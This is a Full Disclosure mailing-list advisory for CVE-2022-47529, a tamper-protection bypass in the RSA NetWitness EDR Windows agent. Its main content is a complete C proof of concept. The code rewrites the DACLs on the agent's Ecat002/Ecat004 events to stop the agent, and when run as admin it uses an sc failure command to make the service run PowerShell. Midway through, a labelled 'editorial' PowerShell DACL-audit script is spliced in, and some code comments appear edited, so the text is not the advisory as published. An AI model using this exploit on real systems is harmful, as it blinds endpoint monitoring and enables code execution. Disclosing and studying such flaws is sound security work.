Message-ID: <CAFD2FDOd-FJsHVncgm8Oe8jWbT0NsPNNWfCVPUrH+34TuZhubQ@mail.gmail.com>
Date: Mon, 27 Mar 2023 23:09:11 -0400
From: hyp3rlinx <apparitionsec@...il.com>
To: fulldisclosure@...lists.org
Subject: [FD] RSA NetWitness EDR Agent / Incorrect Access Control - Code Execution / CVE-2022-47529

[+] Credits: John Page (aka hyp3rlinx)		
[+] Website: hyp3rlinx.altervista.org
[+] Source:  http://hyp3rlinx.altervista.org/advisories/RSA_NETWITNESS_EDR_AGENT_INCORRECT_ACCESS_CONTROL_CVE-2022-47529.txt
[+] twitter.com/hyp3rlinx
[+] ISR: ApparitionSec

[Vendor]
RSA Security
www.netwitness.com


[Product]
NetWitness Endpoint EDR Agent

The RSA NetWitness detection and response (EDR) endpoint monitors
activity across all your endpoints—on and off the network—providing
deep visibility into their security state, and it prioritizes alerts
when there is an issue. NetWitness Endpoint drastically reduces dwell
time by rapidly detecting new and non-malware attacks that other EDR
solutions miss, and it cuts the cost, time and scope of incident
response.


[Vulnerability Type]
Incorrect Access Control / Code Execution


[CVE Reference]
CVE-2022-47529


[Security Issue]
CVE-2022-47529 allows local users to stop the Endpoint Windows agent
from sending events to the SIEM, or to make the agent run
user-supplied commands.

Insecure Win32 memory objects in the Endpoint Windows Agent in
NetWitness Platform through 12.x allow local and admin Windows user
accounts to modify the endpoint agent service configuration: either to
disable it completely or to run user-supplied code or commands,
thereby bypassing the tamper-protection features via ACL modification.

Interestingly, the agent was uploaded to VirusTotal on 2022-01-05
17:24:32 UTC, months before this finding and report.

SHA-256 770005f9b2333bf713ec533ef1efd2b65083a5cfb9f8cbb805ccb2eba423cc3d
LANDeskService.exe


[Severity]
Critical


[Impact(s)]
Denial-of-Service
Arbitrary Code Execution


[Attack Vector]
To exploit, open a handle to the memory objects held by the endpoint
agent, modify the ACL of those that have insecure ACLs, and DENY access
to the Everyone group.


[Affected Product Code Base]
All versions prior to v12.2


[Network Access]
Local


[References]
https://community.netwitness.com/t5/netwitness-platform-security/nw-2023-04-netwitness-platform-security-advisory-cve-2022-47529/ta-p/696935


[Vuln Code Block]:
.text:00000001400F7B10 sub_1400F7B10   proc near               ; CODE XREF: sub_14012F6F0+19B?p
.text:00000001400F7B10                                         ; sub_14013BA50+19?p
.text:00000001400F7B10                                         ; DATA XREF: ...
.text:00000001400F7B10                 push    rbx
.text:00000001400F7B12                 sub     rsp, 20h
.text:00000001400F7B16                 mov     rbx, rcx
.text:00000001400F7B19                 test    rcx, rcx
.text:00000001400F7B1C                 jz      short loc_1400F7B5C
.text:00000001400F7B1E                 call    cs:InitializeCriticalSection
.text:00000001400F7B24                 lea     rcx, [rbx+28h]  ; lpCriticalSection
.text:00000001400F7B28                 call    cs:InitializeCriticalSection
.text:00000001400F7B2E                 mov     edx, 1          ; bManualReset
.text:00000001400F7B33                 xor     r9d, r9d        ; lpName
.text:00000001400F7B36                 mov     r8d, edx        ; bInitialState
.text:00000001400F7B39                 xor     ecx, ecx        ; lpEventAttributes
.text:00000001400F7B3B                 call    cs:CreateEventW
.text:00000001400F7B41                 mov     [rbx+50h], rax
.text:00000001400F7B45                 mov     dword ptr [rbx+58h], 0
.text:00000001400F7B4C                 test    rax, rax
.text:00000001400F7B4F                 jz      short loc_1400F7B5C
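Added example (editorial; not part of the advisory or of any NetWitness code). The block the advisory labels vulnerable passes lpEventAttributes = NULL to CreateEventW (the `xor ecx, ecx`), so by the CreateEventW contract the event receives a default security descriptor rather than one the agent chooses, and the finding in [Security Issue] is a DACL that lets a broad principal rewrite it. The Windows PowerShell script below gives a customer a read-only check of the Ecat002/Ecat004 event DACLs (READ_CONTROL only, never EVENT_ALL_ACCESS), and shows the corrected construction: an event created with an explicit DACL that grants SYSTEM and Administrators full control and Everyone only SYNCHRONIZE. It assumes Windows PowerShell 5.1 on .NET Framework, where EventWaitHandle exposes GetAccessControl; the function names, the Local\Demo* event names and the list of broad SIDs are the example's own.

```powershell
# Added example; not part of the advisory or of any NetWitness code.
# Read-only audit of named Win32 event DACLs for the weakness described
# above (a broad principal holding WRITE_DAC or WRITE_OWNER), plus the
# corrected construction: an event created with an explicit DACL rather
# than a NULL lpEventAttributes. Assumes Windows PowerShell 5.1 (.NET
# Framework, where EventWaitHandle has GetAccessControl). Function names
# and the Local\Demo* event names are the example's own.
Set-StrictMode -Version 2

$Rights = [System.Security.AccessControl.EventWaitHandleRights]

# Well-known SIDs that should hold no more than Synchronize on a
# tamper-protected object: Everyone, Authenticated Users, INTERACTIVE, Users.
$BroadPrincipals = 'S-1-1-0', 'S-1-5-11', 'S-1-5-4', 'S-1-5-32-545'

# Rights that let a caller rewrite the DACL, directly or by taking ownership.
$DangerousRights = $Rights::ChangePermissions -bor $Rights::TakeOwnership

function Test-NamedEventDacl {
    # One record per event: Status is Missing, Unreadable, OK or WEAK;
    # WEAK rows carry the offending identity and its rights.
    param([Parameter(Mandatory)][string[]]$Name)

    foreach ($n in $Name) {
        try {
            # READ_CONTROL is all the audit needs; never ask for EVENT_ALL_ACCESS.
            $h = [System.Threading.EventWaitHandle]::OpenExisting($n, $Rights::ReadPermissions)
        } catch {
            $base = $_.Exception.GetBaseException()
            $status = if ($base -is [System.Threading.WaitHandleCannotBeOpenedException]) { 'Missing' }
                      elseif ($base -is [System.UnauthorizedAccessException]) { 'Unreadable' }
                      else { 'Error: ' + $base.GetType().Name }
            [pscustomobject]@{ Event = $n; Status = $status; Identity = ''; Rights = '' }
            continue
        }
        try {
            $rules = $h.GetAccessControl().GetAccessRules($true, $true,
                         [System.Security.Principal.SecurityIdentifier])
        } finally {
            $h.Dispose()
        }

        $weak = @($rules | Where-Object {
            $_.AccessControlType -eq 'Allow' -and
            $BroadPrincipals -contains $_.IdentityReference.Value -and
            ($_.EventWaitHandleRights -band $DangerousRights) -ne 0 })

        if ($weak.Count -eq 0) {
            [pscustomobject]@{ Event = $n; Status = 'OK'; Identity = ''; Rights = '' }
        } else {
            foreach ($r in $weak) {
                [pscustomobject]@{ Event = $n; Status = 'WEAK'
                                   Identity = $r.IdentityReference.Value
                                   Rights = $r.EventWaitHandleRights }
            }
        }
    }
}

function New-NamedEvent {
    # Creates a manual-reset event with an explicit DACL: SYSTEM and
    # Administrators get FullControl, Everyone gets only $EveryoneRights.
    # Synchronize (the default) is the hardened form; FullControl for
    # Everyone reproduces the class of weakness the audit reports.
    param(
        [Parameter(Mandatory)][string]$Name,
        [System.Security.AccessControl.EventWaitHandleRights]$EveryoneRights = $Rights::Synchronize
    )
    $sec   = New-Object System.Security.AccessControl.EventWaitHandleSecurity
    $allow = [System.Security.AccessControl.AccessControlType]::Allow
    foreach ($sid in 'S-1-5-18', 'S-1-5-32-544', 'S-1-1-0') {
        $who  = New-Object System.Security.Principal.SecurityIdentifier($sid)
        $what = if ($sid -eq 'S-1-1-0') { $EveryoneRights } else { $Rights::FullControl }
        $sec.AddAccessRule((New-Object System.Security.AccessControl.EventWaitHandleAccessRule($who, $what, $allow)))
    }
    $createdNew = $false
    # The named object exists only while a handle is open, so the caller keeps this one.
    New-Object System.Threading.EventWaitHandle($false, [System.Threading.EventResetMode]::ManualReset,
                                                $Name, [ref]$createdNew, $sec)
}

# Constructed demonstration. Session-local names are used because creating
# Global\ objects needs SeCreateGlobalPrivilege; the two Ecat names are the
# agent's from the advisory and resolve only where the agent is installed.
$weakEvt   = New-NamedEvent -Name 'Local\DemoWeakEvent' -EveryoneRights $Rights::FullControl
$strongEvt = New-NamedEvent -Name 'Local\DemoHardenedEvent'
$names = 'Local\DemoWeakEvent', 'Local\DemoHardenedEvent', 'Global\Ecat002', 'Global\Ecat004'
Test-NamedEventDacl -Name $names | Format-Table -AutoSize
$weakEvt.Dispose()
$strongEvt.Dispose()
```

Run as a standard user on a host with the agent installed: a WEAK row for Global\Ecat002 or Global\Ecat004 means a broad principal can rewrite the object's DACL, which is the condition the PoC below relies on; Unreadable means even READ_CONTROL is refused to that caller, which is the expected state after the fix. The two Local\Demo* rows show what each outcome looks like without touching the agent.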



[Exploit/POC]
"RSA_NetWitness_Exploit.c"

#include "windows.h"
#include "stdio.h"
#include "accctrl.h"
#include "aclapi.h"

#define OPEN_ALL_ACCESS 0x1F0003

/*
RSA NetWitness EDR Endpoint Agent
Tamper Protection Bypass / EoP Code Execution
RSA NetWitness.msi --> NWEAgent.exe
MD5: c0aa7e52cbf7799161bac9ebefa38d49

Expected result: Low privileged standard users are prevented from
interfering with and or modifying events for the RSA Endpoint Agent.
Actual result: RSA NetWitness Endpoint Agent is terminated by a low
privileged standard non-administrator user.

By John Page (hyp3rlinx) - Nov 2022

DISCLAIMER: The author of this code is not responsible or liable for
any damages whatsoever from testing, modifying and or misuse.
Users of this supplied PoC code accept all risks, do no harm.

X64 PE file vuln code block:

.text:00000001400F7B10 sub_1400F7B10   proc near               ; CODE XREF: sub_14012F6F0+19B?p
.text:00000001400F7B10                                         ; sub_14013BA50+19?p
.text:00000001400F7B10                                         ; DATA XREF: ...
.text:00000001400F7B10                 push    rbx
.text:00000001400F7B12                 sub     rsp, 20h
.text:00000001400F7B16                 mov     rbx, rcx
.text:00000001400F7B19                 test    rcx, rcx
.text:00000001400F7B1C                 jz      short loc_1400F7B5C
.text:00000001400F7B1E                 call    cs:InitializeCriticalSection
.text:00000001400F7B24                 lea     rcx, [rbx+28h]  ; lpCriticalSection
.text:00000001400F7B28                 call    cs:InitializeCriticalSection
.text:00000001400F7B2E                 mov     edx, 1          ; bManualReset
.text:00000001400F7B33                 xor     r9d, r9d        ; lpName
.text:00000001400F7B36                 mov     r8d, edx        ; bInitialState
.text:00000001400F7B39                 xor     ecx, ecx        ; lpEventAttributes
.text:00000001400F7B3B                 call    cs:CreateEventW
.text:00000001400F7B41                 mov     [rbx+50h], rax
.text:00000001400F7B45                 mov     dword ptr [rbx+58h], 0
.text:00000001400F7B4C                 test    rax, rax
.text:00000001400F7B4F                 jz      short loc_1400F7B5C


1) Install "RSA NetWitness.msi"  (Endpoint EDR Agent)

2) Run the Exploit PoC as a Standard non-admin user; the PoC will:

   a) Open a handle (copy) to the Ecat002 event.
   b) Open additional handles to the events Ecat004 and Ecat002,
      modifying them to deny access to the Everyone group.
   c) Set/Reset the event through the Ecat002 handle.
   d) If running with admin privileges, change the EDR service
      configuration.

   Non-vulnerable agents will output "Not vulnerable!" to the console;
   customers can modify and use this test to see if they are vulnerable.

*/

char Vuln_Events[][32] = {"Global\\Ecat004", "Global\\Ecat002"};
BOOL PWNED=FALSE;
void Exploit();
int AdminChk();          /* was misspelled AdminChl, which left AdminChk undeclared at its call site */
void HijackSvcConfig();


int main(void){
	printf("[+] RSA NetWitness EDR Agent 0Day\n");
	printf("[+] CVE-2022-47529\n");
	printf("[+] Discovery: John Page (aka hyp3rlinx)\n");
	printf("[+] ===================================\n");
	
	Exploit();
	
	if( AdminChk() ){
	   printf("[+] Hijacked NetWitness Agent Service!\n");
	   HijackSvcConfig();
	}
	
	Sleep(2000);
	printf("[+] Done!\n\n");
        system("pause");
	
return 0;
}

void Exploit(){

  PACL pOldDACL = NULL;
  PACL pNewDACL = NULL;
  DWORD err;
  size_t i;

  /* Separate handle on Ecat002, pulsed after each DACL change. Every loop
     iteration uses it, so it is closed only once the loop is done. */
  HANDLE hEvent_Ecat002 = OpenEventA(OPEN_ALL_ACCESS, FALSE, (LPCSTR)"Global\\Ecat002");

  for(i = 0; i < sizeof(Vuln_Events) / sizeof(Vuln_Events[0]); i++){

    /* OpenEvent returns NULL on failure, not INVALID_HANDLE_VALUE. A patched
       agent refuses EVENT_ALL_ACCESS here, which is the "Not vulnerable" case. */
    HANDLE hEvent = OpenEventA(OPEN_ALL_ACCESS, FALSE, (LPCSTR)Vuln_Events[i]);

    if(hEvent == NULL){
      printf("[!] Not vulnerable! OpenEvent(%s) failed: %lu\n", Vuln_Events[i], GetLastError());
      continue;
    }

    printf("[-] Targeting Event: %s\n", Vuln_Events[i]);
    Sleep(500);

    pOldDACL = NULL;
    pNewDACL = NULL;

    if(GetSecurityInfo(hEvent, SE_KERNEL_OBJECT, DACL_SECURITY_INFORMATION,
                       NULL, NULL, &pOldDACL, NULL, NULL) == ERROR_SUCCESS){

      /* Build a single ACE: DENY GENERIC_ALL to the Everyone group. */
      TRUSTEE trustee[1];
      trustee[0].TrusteeForm = TRUSTEE_IS_NAME;
      trustee[0].TrusteeType = TRUSTEE_IS_GROUP;
      trustee[0].ptstrName = TEXT("Everyone");
      trustee[0].MultipleTrusteeOperation = NO_MULTIPLE_TRUSTEE;
      trustee[0].pMultipleTrustee = NULL;

      EXPLICIT_ACCESS explicit_access_list[1];
      ZeroMemory(&explicit_access_list[0], sizeof(EXPLICIT_ACCESS));

      explicit_access_list[0].grfAccessMode = DENY_ACCESS;
      explicit_access_list[0].grfAccessPermissions = GENERIC_ALL;
      explicit_access_list[0].grfInheritance = NO_INHERITANCE;
      explicit_access_list[0].Trustee = trustee[0];

      /* SetEntriesInAcl reports its error as the return value (GetLastError is
         not set). On failure pNewDACL stays NULL and must not be applied: a
         NULL DACL on a kernel object grants everyone full access. */
      err = SetEntriesInAcl(1, explicit_access_list, pOldDACL, &pNewDACL);
      if(err != ERROR_SUCCESS){
        printf("[!] Not vulnerable! SetEntriesInAcl: %lu\n", err);
      }else{
        err = SetSecurityInfo(hEvent, SE_KERNEL_OBJECT, DACL_SECURITY_INFORMATION,
                              NULL, NULL, pNewDACL, NULL);
        if(err != ERROR_SUCCESS){
          printf("[!] Not vulnerable! SetSecurityInfo: %lu\n", err);
        }else{
          if(hEvent_Ecat002 != NULL){
            SetEvent(hEvent_Ecat002);
            Sleep(1000);
            ResetEvent(hEvent_Ecat002);
          }
          SetEvent(hEvent);
          Sleep(1000);
          PWNED = TRUE;
        }
      }

      if(pNewDACL) LocalFree(pNewDACL);
      if(pOldDACL) LocalFree(pOldDACL);
    }

    CloseHandle(hEvent);
    Sleep(1000);
  }

  if(hEvent_Ecat002 != NULL){
    CloseHandle(hEvent_Ecat002);
  }
}

//If run as admin, modify the agent service config to run our own code.
int AdminChk(){
    int result = 0;
    HANDLE hToken = NULL;
    if(OpenProcessToken(GetCurrentProcess(), TOKEN_QUERY,&hToken)){
        TOKEN_ELEVATION elevated;
        DWORD tokSize = sizeof(TOKEN_ELEVATION);
        if(GetTokenInformation(hToken, TokenElevation, &elevated, sizeof(elevated), &tokSize)){
            result = elevated.TokenIsElevated;
        }
     }
    if(hToken){
      CloseHandle(hToken);
    }
    return result;
}


//Trivial example: modify the service config...
void HijackSvcConfig(){
  Sleep(1000);
  /* One C string literal; the embedded quotes are escaped. "Evil-Command-Here" is a placeholder. */
  WinExec("sc failure NWEAgent command= \"C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\" \"Evil-Command-Here\"", 0);
}


[POC Video URL]
https://www.youtube.com/watch?v=kO1fu4IOlSs


[Disclosure Timeline]
Vendor Notification: December 2, 2022
CVE assigned: December 19, 2022
Hotfix v12.1.0.1: January 3, 2023
Fixed in v12.2.0.0: January 4, 2023
Retested for vendor: January 6, 2023
Public Disclosure: March 24, 2023


[+] Disclaimer
The information contained within this advisory is supplied "as-is"
with no warranties or guarantees of fitness of use or otherwise.
Permission is hereby granted for the redistribution of this advisory,
provided that it is not altered except by reformatting it, and
that due credit is given. Permission is explicitly given for insertion
in vulnerability databases and similar, provided that due credit
is given to the author. The author is not responsible for any misuse
of the information contained herein and accepts no responsibility
for any damage caused by the use or misuse of this information. The
author prohibits any malicious use of security related information
or exploits by the author or elsewhere. All content (c).

hyp3rlinx
_______________________________________________
Sent through the Full Disclosure mailing list
https://nmap.org/mailman/listinfo/fulldisclosure
Web Archives & RSS: https://seclists.org/fulldisclosure/
